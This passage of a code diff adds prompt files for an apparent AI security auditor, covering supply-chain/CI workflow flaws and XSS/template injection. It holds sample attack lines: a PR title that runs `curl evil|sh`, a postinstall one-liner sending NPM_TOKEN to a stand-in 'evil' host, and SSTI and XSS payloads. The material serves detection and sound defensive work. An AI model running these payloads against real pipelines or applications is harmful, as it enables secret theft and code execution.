+  - **.NET:** `*.csproj`, `packages.config`, `nuget.config` (insecure feeds).
+- **Lifecycle / install / build scripts** (run at `install`/build time with whatever
+  privileges the developer/CI has):
+  - npm/yarn/pnpm lifecycle: `preinstall`, `install`, `postinstall`, `prepare`,
+    `prepublish`, `prepublishOnly` in `package.json` `scripts`; `node-gyp`/binary
+    download hooks; `.npmrc` `ignore-scripts=false`.
+  - Python: `setup.py` arbitrary code at install, `pyproject.toml` build backends,
+    `cffi`/`build_ext` custom commands, `conftest.py` auto-loaded by pytest in CI.
+  - Ruby: `*.gemspec` `extensions` / `ext/extconf.rb` native build; `Rakefile`
+    auto-run tasks.
+  - Rust: `build.rs` (runs arbitrary code at build), proc-macro crates.
+  - Go: `//go:generate`, cgo, `go:embed` of fetched content.
+  - Make/CMake/Gradle init scripts, `Dockerfile` `RUN curl ... | sh`.
+- **Artifact-fetch integrity:** `Dockerfile`/`docker-compose` base images by mutable
+  tag (`:latest`) vs digest; `RUN curl|wget ... | sh|bash`; downloads over plain
+  `http://`; `go install pkg@latest`, `pip install` from a git URL/branch,
+  `gem "x", git: ...` on a branch, `cargo install` from git; custom/insecure package
+  registries (`--index-url`, `source` blocks, `nuget.config` HTTP feeds).
+
+Grep signals (workflows): `pull_request_target`, `workflow_run`, `issue_comment`,
+`pull_request_review_comment`, `actions/checkout` with `ref:`/`head.sha`/`head.ref`,
+`${{ github.event.` (esp. `.pull_request.title`/`.body`/`.head.ref`/`.comment.body`/
+`issue.title`), `run:` blocks containing `${{`, `permissions:`, `write-all`,
+`contents: write`, `id-token: write`, `pull-requests: write`, `secrets:`,
+`GITHUB_TOKEN`, `uses: .*@(main|master|v?\d+)$` (tag/branch, not 40-hex SHA),
+`uses: ./` self-host, `actions/github-script`, `tj-actions/`, `curl|sh`, `pull_request`
+with `secrets`. Manifests: version specifiers `^`/`~`/`*`/`latest`/`>=`/`branch:`,
+git URLs, `overrides`/`resolutions`, `replace`/`[patch]`, missing lockfile. Scripts:
+`postinstall`, `preinstall`, `prepare`, `build.rs`, `extconf.rb`, `setup.py`.
+
+## 3. Detection heuristics
+
+This class has three distinct taint shapes — frame every finding around which one.
+
+**Shape A — Dangerous CI/CD workflow (untrusted PR/event → code exec with secrets).**
+- **SOURCE** = an event a non-collaborator can trigger that runs in a *privileged*
+  context: `pull_request_target`, `workflow_run` (chained off a fork PR),
+  `issue_comment`, `pull_request_review_comment`, `discussion*`, or a scheduled/`push`
+  job that consumes PR-controlled state. Plus the attacker-controlled fields inside
+  the event: PR head `ref`/`sha`/branch name, PR title/body, comment body, issue
+  title, label/branch names.
+- **SINK** = (1) checking out and executing the fork's untrusted code (`actions/checkout`
+  with `ref: ${{ github.event.pull_request.head.sha|head.ref }}` followed by `npm
+  install`/`make`/`./script`/test that runs repo code) *in a job that holds secrets or
+  a write token*; or (2) a `${{ <attacker field> }}` expression interpolated directly
+  into a `run:` shell (script injection) / into `actions/github-script` JS.
+- Vulnerable patterns to confirm:
+  - **`pull_request_target` + untrusted checkout:** `on: pull_request_target` (runs with
+    the *base* repo's secrets and a read/write token) that does
+    `uses: actions/checkout@... with: ref: ${{ github.event.pull_request.head.ref }}`
+    then builds/tests/installs — the fork's code (incl. its `package.json`
+    `postinstall`, its build scripts) executes with access to `secrets.*` and
+    `GITHUB_TOKEN`. Same trap via `workflow_run` triggered by the fork's
+    `pull_request` workflow, then checking out / downloading the fork's artifact.
+  - **`${{ }}` script injection:** any attacker-controlled event field interpolated
+    into `run:`/`script:`/`github-script`. Canonical:
+    `run: echo "${{ github.event.pull_request.title }}"` — a PR title of
+    `"; curl evil|sh #` breaks out of the shell string and runs in CI. Likewise
+    `${{ github.event.issue.title }}`, `${{ github.head_ref }}` (branch name with
+    backticks/`$()`), `${{ github.event.comment.body }}`,
+    `${{ github.event.review.body }}`. The expansion happens *before* the shell sees
+    it, so shell quoting in the YAML does not save you.
+  - **Self-hosted runner on public-repo fork PRs:** fork PRs landing on a
+    self-hosted runner = arbitrary code on your infra.
+- **GitLab/others:** `rules`/`only` that run on merge-request pipelines from forks with
+  protected variables exposed; `Jenkinsfile` building untrusted PR branches with
+  credentials bound; CircleCI `pr-comment`-triggered jobs.
+
+**Shape B — Over-broad / leaked CI permissions (amplifies A, or is the bug itself).**
+- **SINK** = a `GITHUB_TOKEN` with more scope than the job needs, reachable by attacker
+  code from Shape A or by a compromised dependency running in the job:
+  - No top-level `permissions:` block (default is often `write-all`/broad on older
+    repos), or `permissions: write-all`, or `contents: write` / `packages: write` /
+    `id-token: write` (OIDC cloud creds) / `pull-requests: write` /
+    `actions: write` granted to a job that also runs untrusted/third-party code.
+  - Secrets (`secrets.*`, cloud keys, npm publish token) exposed as `env:` in a job
+    that checks out or executes untrusted PR code or an unpinned third-party action.
+  - A reusable/third-party action receiving `secrets: inherit`.
+- This is only a *finding* when the broad token/secret is reachable by code an attacker
+  controls (a fork checkout, a `${{}}` injection, or an unpinned mutable action that
+  could be swapped) — not merely "scope is wider than ideal" with no untrusted code in
+  the job. Tie it to a concrete reach path.
+
+**Shape C — Untrusted/compromisable component reaches build or runtime.**
+- **SOURCE** = a package/Action/image the project pulls whose *content can change under
+  an attacker* (mutable ref, registry takeover, typosquat, dependency confusion) or is
+  *already known-exploitable*.
+- **SINK** = code execution at install/build time, or invocation of a vulnerable API in
+  a reachable code path.
+- Vulnerable patterns to confirm:
+  - **Unpinned GitHub Action (mutable ref):** `uses: some/action@v3` or `@main` — tags
+    and branches are movable; a compromised maintainer or tag re-point runs new code in
+    your pipeline with your token/secrets. The famous `tj-actions/changed-files`
+    incident is exactly this. *Pinned* = full 40-char commit SHA. Self-`uses: ./local`
+    is fine (in-repo).
+  - **Malicious / dangerous lifecycle script (CWE-506):** a `postinstall`/`preinstall`/
+    `prepare` (npm), `build.rs` (Rust), `setup.py` install hook, gemspec `extensions`,
+    or `Makefile`/`Dockerfile` `RUN curl ... | sh` that exfiltrates env/secrets, phones
+    home, downloads+executes remote code, or runs obfuscated payloads. Read the actual
+    script: look for `curl`/`wget`/`fetch` piped to a shell or `eval`, base64/hex
+    blobs, `child_process`/`os.system`/`exec` touching `process.env`/`~/.npmrc`/
+    `~/.aws`, network calls to odd hosts. (A first-party build hook that only compiles
+    local source is NOT this.)
+  - **Known-vulnerable dependency, reachable (CWE-1104/1357):** a pinned version in a
+    lockfile that an OSV/GHSA query flags as vulnerable AND the vulnerable function is
+    invoked by the app's own code on a path that can receive untrusted input. E.g. a
+    `lodash` prototype-pollution CVE where the app calls `_.merge(req.body, ...)`; a
+    `log4j`/`Log4Shell` (`CVE-2021-44228`) version with user-controlled log strings; a
+    `Pillow`/`libxml`/`marshmallow`/`urllib3`/`requests` advisory whose vulnerable code
+    path the app exercises. Use the lockfile's exact version, the advisory's affected
+    range, and a real call site. (A CVE in a transitive dep that the app never reaches,
+    or a dev-only tool, is at most Low/Info — see §4.)
+  - **Typosquat / dependency confusion (CWE-829):** a dependency name that shadows an
+    internal/private package (no scope, public registry resolves it) or is one keystroke
+    off a popular package (`lodahs`, `crossenv`, `python-dateutil` vs `dateutil`).
+    Confirm the name is suspect AND the registry/resolution actually pulls the public/
+    attacker copy.
+  - **Insecure fetch / mutable base image:** `Dockerfile FROM node:latest` (mutable) or
+    a base by tag with no digest; `RUN curl http://... | sh` (plaintext + execute);
+    `pip install` / `go install ...@latest` / `gem ... git:` on a moving branch; a
+    package source over `http://` or an untrusted custom registry without integrity.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these holds:
+
+- **The workflow trigger runs only trusted code / can't reach secrets.** Plain
+  `on: pull_request` (NOT `_target`) from a fork runs with a *read-only* `GITHUB_TOKEN`
+  and **no** repo secrets by default — executing fork code there is the intended,
+  unprivileged path; it is not a finding unless secrets are explicitly injected or it's
+  on a self-hosted runner. A `pull_request_target` job that checks out the *base* repo
+  (default `ref`, or `ref: ${{ github.sha }}`/`github.event.pull_request.base.sha`) and
+  never runs fork code is safe — verify the `ref:`.
+- **`${{ }}` value is trusted or safely passed.** The expression references a non-attacker
+  field (`github.sha`, `github.repository`, `secrets.*`, `github.run_id`, a `vars.*`
+  set by maintainers) — no injection. OR the attacker field is passed via an intermediate
+  `env:` var and the shell references `"$ENVVAR"` (quoted) — that is the documented safe
+  pattern; the dangerous form is direct `${{ }}` *inside* the `run:` string. OR it's used
+  in a context that isn't a shell/JS sink (e.g. `if:` comparison, a `with:` input to an
+  action that treats it as data). Confirm the field is attacker-controlled AND lands in a
+  shell/`eval`/`script` sink un-indirected.
+- **Token scope is already least-privilege for the work in the job, or no untrusted code
+  shares the job.** A top-level `permissions: read-all`/`contents: read`, or per-job
+  `permissions:` granting only what that job needs, is correct — don't flag width that
+  matches the task. `contents: write` on a release job that runs only first-party pinned
+  steps is fine. The finding requires untrusted/swappable code co-resident with the broad
+  token.
+- **Action / dependency is effectively pinned or integrity-checked.** Action pinned to a
+  full 40-hex commit SHA (`@a1b2c3...`); dependency pinned to an exact version with a
+  committed lockfile and integrity hashes (`package-lock.json` `integrity:`,
+  `Cargo.lock`, `go.sum`, `Gemfile.lock`, `pnpm-lock` with `--frozen-lockfile` in CI);
+  Docker base by `@sha256:` digest. A `^`/`~` range in `package.json` is *resolved and
+  locked* by the committed lockfile — that's acceptable; flag unpinned only when there's
+  no lockfile, or CI installs without `--frozen-lockfile`/`npm ci`, or the ref is truly
+  mutable (branch/`latest`/tag-only Action). Range-without-lockfile or a re-resolving
+  install IS a finding.
+- **Lifecycle script is first-party and benign.** A `postinstall` that compiles the
+  project's own native addon, runs `husky install`, or builds local TypeScript — reads no
+  secrets, fetches no remote code, no obfuscation. `build.rs`/`extconf.rb` that only
+  compiles vendored/local source. Read it and confirm it does nothing network/exec on
+  untrusted input. (`ignore-scripts=true` in `.npmrc` also neutralizes third-party
+  install scripts — note it as a mitigation.)
+- **Vulnerable dependency is unreachable, dev-only, or already patched.** The CVE's
+  vulnerable function is never called by app code, or only by a `devDependencies` /
+  test / build tool not shipped or not exposed to untrusted input; OR the locked version
+  is *outside* the advisory's affected range (read the range precisely — off-by-one here
+  is the #1 false positive); OR an `overrides`/`resolutions`/`[patch]`/`replace` already
+  forces a fixed version. A version that merely "could be newer" with no advisory and no
+  sink is NOT a finding — that's hygiene → Info appendix.
+- **Posture/process, not an exploit path.** Missing SBOM, no `SECURITY.md`, no
+  Dependabot/Renovate, no signed commits, low maintainer count, missing branch
+  protection *as a standalone observation* → Info appendix per AGENTS.md, never the body.
+  (OSSF Scorecard hygiene checks belong here; only its code-exploitable checks —
+  Dangerous-Workflow, Token-Permissions, Pinned-Dependencies *with a reach path*,
+  reachable Vulnerabilities — are body findings.)
+- **The workflow/manifest is dead or not in the default branch.** A disabled/orphaned
+  workflow, a fixture, or one not triggered by any reachable event.
+
+If a "mitigation" is bypassable — a `pull_request_target` that *claims* to check out base
+but a later step re-checks-out the head; an `env:`-indirection that is still expanded into
+a shell via `${{}}`; a lockfile present but CI runs `npm install` (re-resolves) instead of
+`npm ci`; an `overrides` that pins the direct dep but the vuln is reached transitively
+elsewhere; an Action "pinned" to a tag a third party can move — it is NOT a mitigation.
+Flag it and name the exact bypass in `sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — unauthenticated/any-fork attacker → arbitrary code execution in CI with
+  access to **production-impacting secrets or a write/publish token or OIDC cloud creds**:
+  `pull_request_target` (or `workflow_run`) checking out and executing fork code in a job
+  holding `secrets.NPM_TOKEN`/cloud keys/`id-token: write`; `${{ }}` script injection in
+  such a job; a malicious `postinstall` in a shipped/CI-run dependency that exfiltrates
+  those secrets; a remotely-exploitable known-vuln dep (e.g. Log4Shell) reachable with
+  untrusted input on a network-facing path. Also: a swappable third-party Action in a
+  job with a publish token (effective supply-chain RCE).
+- **High** — code execution in CI with a write-scoped `GITHUB_TOKEN` but no high-value
+  external secret (still allows tampering with the repo / releases / pushing commits);
+  script injection / untrusted checkout in a job with `contents: write` but no cloud
+  creds; an unpinned mutable Action co-resident with a write token; a known-exploitable
+  reachable dep CVE requiring authentication or non-default conditions; dependency
+  confusion/typosquat that resolves to a public name shadowing an internal package.
+- **Medium** — over-broad token reachable only under narrower conditions; unpinned Action
+  in a read-only job (tampering limited); a reachable dep vuln of moderate impact
+  (limited DoS, info leak) or one needing unusual config; mutable base image / `curl|sh`
+  fetch with no signature where the source is reputable-but-unverified.
+- **Low/Info** — unpinned dependency/Action with **no** reachable secret or untrusted-code
+  co-residency (pure pinning hygiene), a CVE in an unreached/dev-only dep, plaintext
+  `http://` fetch of non-executable data, "could upgrade" without an advisory. Pure
+  posture (no SBOM/SECURITY.md/Dependabot, maintainership) → **Info appendix only**.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup; e.g. one finding for "all jobs lack a
+`permissions:` block" listing the files in `rationale`, not one per job). Fields:
+
+```json
+{
+  "id": "supply-chain-001",
+  "title": "pull_request_target checks out & builds fork code with NPM_TOKEN in scope",
+  "vuln_class": "supply-chain",
+  "owasp": "A03:2025",
+  "cwe": "CWE-829",
+  "asvs": "V15",
+  "severity": "critical",
+  "status": "likely",
+  "confidence": "high",
+  "file": ".github/workflows/pr-build.yml",
+  "line": 7,
+  "end_line": 24,
+  "code_excerpt": "on:\n  pull_request_target:\n...\n      - uses: actions/checkout@v4\n        with:\n          ref: ${{ github.event.pull_request.head.sha }}\n      - run: npm ci && npm test\n        env:\n          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}",
+  "source": "Any GitHub user opens a PR from a fork; pull_request_target runs in the BASE repo's privileged context (repo secrets + read/write GITHUB_TOKEN). Attacker controls the checked-out head.sha (their fork's code, incl. its package.json postinstall).",
+  "sink": "actions/checkout of head.sha then `npm ci`/`npm test` executes the fork's arbitrary code (lifecycle scripts + test code) in a job where secrets.NPM_TOKEN and GITHUB_TOKEN are present.",
+  "data_flow": "fork PR -> pull_request_target trigger (privileged) -> checkout ref: head.sha (untrusted) -> npm ci runs fork's postinstall + test runs fork's code -> code reads process.env.NPM_TOKEN / GITHUB_TOKEN and exfiltrates. No guard between checkout-of-head and secret-bearing run.",
+  "sanitizers_checked": "trigger is pull_request_target (privileged), NOT plain pull_request; checkout ref is head.sha (untrusted fork), NOT base.sha; no `if:` gating to trusted authors / labels-after-review; secrets explicitly injected as env in the same job; no `permissions:` narrowing (token is read/write); not a self-`./` action.",
+  "rationale": "Textbook dangerous-workflow: privileged trigger + untrusted checkout + secrets in job = full secret exfiltration / npm package takeover by any anonymous PR author. Same pattern also in .github/workflows/label.yml:12.",
+  "exploit_sketch": "Fork the repo; add to package.json: \"postinstall\":\"node -e 'require(\\\"https\\\").get(`https://evil/?t=`+process.env.NPM_TOKEN)'\"; open a PR. The pull_request_target job checks out my fork at head.sha and runs npm ci, executing postinstall with NPM_TOKEN in env — token exfiltrated; I publish a malicious version of the package.",
+  "dynamic_poc_plan": "On an isolated fork of the repo wired to a throwaway runner with a dummy SECRET, open a PR whose package.json postinstall writes process.env to the job log (or curls a local listener). Observe the workflow run executing the fork's postinstall and the dummy secret value appearing in the captured output — proving fork code runs with secret access. Never exfiltrate a real token off-box.",
+  "proposed_fix": "Untrusted fork code must never execute in a context that holds repo secrets or a write token: keep building/testing fork code on the unprivileged trigger and ensure any secret-bearing step only ever runs first-party base code. Direction only — the exact split/gating/permissions changes are for the engineer who picks this up; this is a high-level direction, not a patch."
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, `sanitizers_checked` must be concrete and
+true. `source` = the untrusted origin (which fork/PR/event field, which attacker-publishable
+package, which mutable ref). `sink` = the precise dangerous op (the checkout+run that
+executes untrusted code, the `${{}}`-in-shell, the install-time `exec`, the call site of
+the vulnerable API). `data_flow` = how the untrusted thing reaches the sink and why no
+guard stops it (name the trigger, the `ref:`, the token scope, the lockfile/pinning state).
+`sanitizers_checked` = the §4 FP guard made explicit — confirm the trigger is privileged
+(not plain `pull_request`), the checkout is head-not-base, the `${{}}` is direct-not-
+env-indirected, the Action is tag-not-SHA, the lockfile is absent / CI re-resolves, the
+CVE version is *inside* the affected range and the function is reached — and state each as
+absent or name the bypass. Pick `cwe` by shape: 829 untrusted checkout / dependency
+confusion / external-code inclusion, 506 embedded malicious lifecycle script, 1104
+unmaintained/known-vuln component, 1357 insufficiently-trustworthy component (mutable
+Action/image, typosquat). Use `status:"likely"` for a proven static trace (privileged
+trigger + untrusted reach, or locked-vuln-version + reachable call site), `"confirmed"`
+only after dynamic repro, `"triage"` if reachability/privilege/version-range is uncertain
+(e.g. can't confirm the CVE function is called, or unsure the runner is self-hosted).
+
+## 7. Dynamic PoC strategy
+
+Goal: prove the *running* pipeline or build executes untrusted code with the claimed
+privilege, or that a vulnerable dependency is actually reachable. Work only against an
+isolated copy/fork wired to a throwaway runner and **dummy** secrets — never exfiltrate a
+real token or mutate a real registry/account.
+
+- **Dangerous workflow (Shape A).** Clone the repo into an isolated fork with a
+  self-hosted/ephemeral runner and a placeholder secret (`SECRET=poc-canary-<nonce>`).
+  Trigger the workflow the attacker's way: open a PR from a fork whose `package.json`
+  `postinstall` (or whatever the job runs) echoes `process.env`/`$SECRET` to the job log
+  or to a local listener. **Proof:** the workflow run shows the fork's code executing and
+  the canary secret value appearing in the captured log / listener — fork code ran with
+  secret access. For self-hosted-runner exposure, show a benign `id`/`hostname` command
+  from fork code running on your infra.
+- **`${{ }}` script injection.** Open a PR / comment whose injected field carries a benign
+  command, e.g. PR title `` x"; echo INJECTED-<nonce> > $GITHUB_WORKSPACE/poc; # `` (or a
+  branch name with `$(echo INJECTED)`). **Proof:** the job log shows `INJECTED-<nonce>` /
+  the `poc` file exists — the title broke out of the shell string and executed. Keep the
+  payload to a harmless marker.
+- **Over-broad token (Shape B).** Within the above fork-code execution, use the
+  `GITHUB_TOKEN` to perform a write the job shouldn't need on the *throwaway* repo (e.g.
+  create a benign issue/label via the API, or push a no-op commit to a scratch branch).
+  **Proof:** the API call returns 2xx — the token is write-scoped and reachable by
+  untrusted code. Revert the change.
+- **Malicious / dangerous lifecycle script (Shape C).** In an isolated container, run the
+  install with scripts enabled (`npm ci` / `cargo build` / `pip install .`) under an
+  egress monitor (`strace -f -e trace=network`, a sinkhole DNS, or a local capture
+  proxy). **Proof:** the script makes an unexpected outbound connection, reads
+  `process.env`/`~/.npmrc`/`~/.aws`, or decodes+executes a remote/obfuscated payload —
+  captured in the trace. Compare against `--ignore-scripts` to confirm the script is the
+  vector.
+- **Unpinned mutable Action / base image.** Demonstrate mutability: show the `@v3`/`@main`
+  ref resolves to a SHA you do not control and that re-pointing the tag/branch (or a
+  registry-side re-push for a `:latest` image) would change what runs — in the isolated
+  fork, point the `uses:` at a fork-controlled copy of the action at the same tag and
+  show your code runs in the pipeline. **Proof:** attacker-controlled action code executes
+  with the job's token.
+- **Known-vulnerable dependency (reachable).** Confirm the locked version is in the
+  advisory's affected range (`npm ls <pkg>`/`pip show`/`bundle list`/`go list -m`), then
+  boot the app and send the vuln's trigger to the reachable endpoint (e.g. a
+  prototype-pollution body to the route that calls `_.merge(req.body,…)`; a JNDI lookup
+  string to a field that gets logged by the vulnerable log4j). **Proof:** observe the
+  vulnerability's effect (polluted property changing app behavior, the OOB JNDI/HTTP
+  callback firing, the crash/leak the CVE describes) — proving the dep is both vulnerable
+  *and* reached. Use a benign OOB nonce, never a real exploit payload.
+
+Record the exact trigger/command and observed evidence in the `Repro` object
+(`reproduced`, `method:"live-exploit"`, `poc`, `observed`, `impact`). The workflow run
+executing fork code with a dummy secret in the log, the injected marker appearing, the
+token write succeeding, the install-time egress capture, or the dep's effect firing on a
+live route each prove the class — set `method:"live-exploit"`. If a runner/registry/app
+can't be stood up, fall back to a static trace (privileged trigger + untrusted `ref:` and
+in-scope secrets; or locked-affected-version + a concrete reachable call site) and set
+`method:"static-poc"`, `status:"likely"`, noting the gap. NEVER exfiltrate real secrets,
+publish to a real registry, or run a real exploit against third-party infrastructure to
+prove a finding — a dummy-secret/benign-marker repro is sufficient and required.
diff --git a/plugins/security/prompts/finders/xss-ssti.md b/plugins/security/prompts/finders/xss-ssti.md
new file mode 100644
index 0000000..5450a75
--- /dev/null
+++ b/plugins/security/prompts/finders/xss-ssti.md
@@ -0,0 +1,300 @@
+<!--
+FINDER PROMPT — xss-ssti. You are a fresh-context auditor hunting ONE class:
+XSS & Template Injection. Read the target's code; emit finding objects.
+Signal discipline (AGENTS.md) is binding: only a REACHABLE untrusted-input →
+HTML/JS/template sink with no effective escaping/sanitizer on the path is a
+finding. No defense-in-depth musings, no dead code, no posture items.
+-->
+
+# Finder — XSS & Template Injection (xss-ssti)
+
+**Class key:** `xss-ssti` · **OWASP:** A05:2025 · **CWE:** CWE-79, CWE-1336, CWE-116 · **ASVS:** V1/V3
+
+## 1. Objective
+
+Find places where untrusted input reaches an HTML/JS/DOM rendering sink without
+contextually-correct escaping (XSS), or reaches a template engine as *template
+source* rather than *data* (SSTI). The bug is attacker bytes interpreted as
+markup, script, or template code — not just displayed as text.
+
+## 2. Where to look
+
+Entry points where a request value, stored record, or external payload becomes
+part of an HTML response, a DOM mutation, or a compiled template:
+
+- **Server-rendered views:** controllers/handlers that build HTML strings,
+  interpolate into templates, or pass user data to a view. Look at view files
+  (`.erb`, `.ecr`, `.haml`, `.slim`, `.ejs`, `.pug`, `.hbs`, `.jinja`/`.html`,
+  `.blade.php`, `.gohtml`/`.tmpl`, JSP/Thymeleaf) and any helper that emits
+  "raw"/"safe"/"unescaped" output.
+- **JSON/API → client render:** API returns user data that a SPA injects via
+  `innerHTML`/`v-html`/`dangerouslySetInnerHTML`; or server embeds user data
+  into an inline `<script>` JSON island (`<script>var d = {{ data }}</script>`).
+- **DOM XSS surfaces (client JS):** reads of `location.*`, `document.URL`,
+  `referrer`, `name`, `postMessage` data, `localStorage`, hash/query parsing,
+  flowing into `innerHTML`, `document.write`, `eval`, `setAttribute("href"...)`,
+  jQuery `.html()/.append()`, framework bypass APIs.
+- **Template-as-data confusion (SSTI):** user input used to *build* a template
+  string, choose a template name/path, or rendered inline (email/notification
+  templating, report builders, CMS "custom template" fields, `render inline:`,
+  Handlebars/Mustache where the *template* itself is user-supplied).
+- **Markdown/rich-text/SVG/email:** Markdown→HTML renderers with raw-HTML
+  passthrough, WYSIWYG body stored then re-rendered (stored XSS), uploaded SVG
+  served inline, HTML email previews.
+- **Reflected surfaces:** error pages echoing the bad input, search-result
+  pages, `redirect`/`next` params written into `<a href>` or `<meta refresh>`,
+  filenames/headers reflected into HTML.
+- **Attribute / URL / JS-string contexts:** values placed inside `href`/`src`
+  (→ `javascript:` URIs), event-handler attributes, `style`, or inside an inline
+  script — each needs context-specific encoding, not just HTML-entity escaping.
+
+Per-language sink/render signals:
+
+- **Crystal:** ECR `<%= %>` is **not** auto-escaped (use `<%= ... %>` with manual
+  `HTML.escape` — raw by default); Kemal/Lucky raw helpers, `env.response.print`
+  of interpolated HTML, `String#to_s` into ECR without `HTML.escape`.
+- **Ruby:** `raw`, `html_safe`, `.html_safe`, `<%== %>` (Erubi raw), `sanitize`
+  misuse, `content_tag` with raw, `render inline: params[...]`, ERB.new on user
+  string, Slim/Haml `==`, `raw()` in Sinatra; SSTI via Liquid/ERB template
+  source from input.
+- **Node/TS:** `res.send("<...>"+x)`, `dangerouslySetInnerHTML={{__html:x}}`
+  (React), `v-html` (Vue), `[innerHTML]` (Angular) / `bypassSecurityTrustHtml`,
+  `el.innerHTML=`, `document.write`, EJS `<%- %>`, Pug `!{}`/`unescaped`,
+  Handlebars triple-stash `{{{ }}}` or `SafeString`, `_.template`, Nunjucks
+  `{% autoescape false %}` / `| safe`; SSTI via `new Function`,
+  `eval`, `vm.runInNewContext`, or template compiled from user string.
+- **Python:** Jinja2 `| safe`, `Markup(x)`, `{% autoescape false %}`,
+  `render_template_string(user)` (classic SSTI), `flask.Markup`, Django
+  `mark_safe`, `format_html` misuse, `{% autoescape off %}`, f-string/`%`/
+  `.format` building a template then `Template(s).render(...)`, Mako default
+  (no auto-escape).
+- **Go:** `text/template` (NO auto-escaping — XSS by design if HTML output),
+  `template.HTML(x)` / `template.JS` / `template.URL` (bypass `html/template`
+  escaping), `fmt.Fprintf(w, "<...>"+x)`, `w.Write([]byte("<b>"+x))`.
+- **PHP:** `echo $_GET[...]`, `print`, string interpolation into HTML,
+  `Twig` `|raw` / `autoescape false`, Blade `{!! !!}` (unescaped) vs `{{ }}`,
+  Smarty `{$x nofilter}`; SSTI via `eval`, `create_function`, Twig template
+  from user string.
+- **Java/JVM:** JSP `<%= %>` (unescaped) / `<c:out escapeXml="false">`,
+  Thymeleaf `th:utext` (unescaped) vs `th:text`, FreeMarker/Velocity with user
+  template source (SSTI), `response.getWriter().print(req.getParameter(...))`,
+  Spring `@ResponseBody` returning raw HTML, JSF EL `${param.x}` rendered.
+- **Rust:** `askama`/`maud` are escaped by default — flag `| safe`-equivalents,
+  `PreEscaped`/`Markup` (maud) wrapping user data, `Html(format!("<b>{}",x))`
+  in axum/actix, `tera` `| safe` / `autoescape` disabled, raw `write!` of HTML.
+
+## 3. Detection heuristics
+
+**Taint SOURCES** (untrusted): HTTP query/body/path/header values (incl.
+`Referer`, `User-Agent`, `X-Forwarded-*`, `Host`), cookies, uploaded file
+names/contents, **stored DB rows that were user-set** (stored XSS — the highest-
+value variant), webhook/queue payloads, `location.href`/`hash`/`search`,
+`document.referrer`, `window.name`, `postMessage` `event.data`, `localStorage`/
+`sessionStorage`, and any value derived from these.
+
+**Taint SINKS** (dangerous op): the render/DOM/template calls in §2 where the
+output is *interpreted* (parsed as HTML, executed as JS, or compiled as a
+template) rather than emitted as inert text. The decisive question is **does an
+effective, context-correct encoder sit between source and sink?**
+
+Vulnerable patterns to confirm (real APIs):
+
+- **Reflected XSS — direct echo:**
+  - Node: `res.send(`<h1>${req.query.q}</h1>`)`
+  - PHP: `echo "Hello ".$_GET['name'];`
+  - Python: `return f"<p>{request.args['q']}</p>"` (no template escaping)
+  - Go: `fmt.Fprintf(w, "<div>%s</div>", r.FormValue("q"))`
+  - Java: `out.print("<p>"+request.getParameter("q")+"</p>");`
+- **Disabled / bypassed auto-escaping in a template:**
+  - Ruby: `<%= params[:bio].html_safe %>` / `raw user.bio`
+  - Jinja2: `{{ user.bio | safe }}` / `Markup(user.bio)` / `{% autoescape off %}`
+  - React: `<div dangerouslySetInnerHTML={{__html: comment.body}} />`
+  - Vue: `<div v-html="comment.body">` ; Angular: `[innerHTML]="body"` after
+    `bypassSecurityTrustHtml(body)`
+  - Handlebars: `{{{ body }}}` ; EJS: `<%- body %>` ; Blade: `{!! $body !!}` ;
+    Thymeleaf: `th:utext="${body}"`
+  - Go: `template.HTML(userData)` passed to `html/template`
+- **DOM XSS:**
+  - `el.innerHTML = location.hash.slice(1)`
+  - `document.write(new URLSearchParams(location.search).get("q"))`
+  - `$("#out").html(userInput)` ; `eval(location.hash)` ;
+    `a.href = userInput` (→ `javascript:alert(1)`)
+- **Server-Side Template Injection (CWE-1336) — user controls the template, not
+  the data:**
+  - Python/Flask: `render_template_string("Hi "+request.args["name"])` →
+    payload `{{7*7}}`/`{{config}}`/`{{request.application...}}` → RCE on Jinja2.
+  - Ruby: `ERB.new(params[:tpl]).result(binding)` / `render inline: params[:t]`
+  - Node: `handlebars.compile(req.body.tpl)` ; `_.template(userTpl)` ;
+    `new Function("return `"+userTpl+"`")()`
+  - Java: FreeMarker `new Template("t", new StringReader(userTpl), cfg)` ;
+    Velocity `Velocity.evaluate(ctx, w, "t", userTpl)`
+  - PHP: Twig `$twig->createTemplate($_GET['t'])->render()`
+  - Signal: input is concatenated/passed where a *template literal/string* is
+    expected, or selects the template name (`render(params[:view])` →
+    traversal/engine-specific injection).
+- **Wrong-context encoding (encoded but still injectable):** HTML-entity escaped
+  but placed inside a JS string (`<script>var x="{{ q }}"</script>` → break out
+  with `</script>`), inside an unquoted attribute (` onmouseover=...`), or inside
+  `href`/`src` (entity-escaping does not stop `javascript:`/`data:` URIs).
+- **Unsafe sanitizer config / raw passthrough in Markdown:** `marked` with
+  `sanitize:false` (or modern `marked` which dropped sanitize — needs external
+  sanitizer), `markdown-it({html:true})`, Python `markdown` with no bleach,
+  `Redcarpet.new(..., filter_html: false)`, Goldmark with `WithUnsafe()`.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these is present AND effective for the **specific output
+context**:
+
+- **Framework auto-escaping left ON, value emitted through the escaped path:**
+  Rails ERB `<%= %>` (auto-escapes), React `{value}` (JSX text — escaped), Vue
+  `{{ }}` (escaped), Angular interpolation `{{ }}` (escaped + built-in
+  sanitizer), Jinja2/Twig/Nunjucks/Tera default autoescape, `html/template`
+  (Go), Blade `{{ }}`, Thymeleaf `th:text`, askama/maud (Rust) defaults,
+  ECR/Crystal only if `HTML.escape` is applied. Escaped text output is inert.
+- **Contextually-correct encoder applied:** `HTML.escape`/`ERB::Util.html_escape`,
+  `CGI.escapeHTML`, `htmlspecialchars($x, ENT_QUOTES, 'UTF-8')`, Go `html
+  /template` auto or `template.HTMLEscapeString`, Java `OWASP Encoder`
+  (`Encode.forHtml`/`forJavaScript`/`forUriComponent`), `DOMPurify.sanitize(x)`
+  before `innerHTML`, `textContent`/`innerText`/`createTextNode` (NOT
+  `innerHTML`), `setAttribute` for non-URL attrs. The encoder must match the
+  context (HTML body vs attribute vs JS vs URL) — HTML-entity escaping inside a
+  JS/URL context is NOT effective.
+- **Vetted HTML sanitizer on a raw-HTML feature:** `DOMPurify.sanitize`,
+  Rails `sanitize`/`sanitize_helper` with a restrictive allowlist, Python
+  `bleach.clean` / `nh3`, `sanitize-html` (Node) with a safe config, OWASP
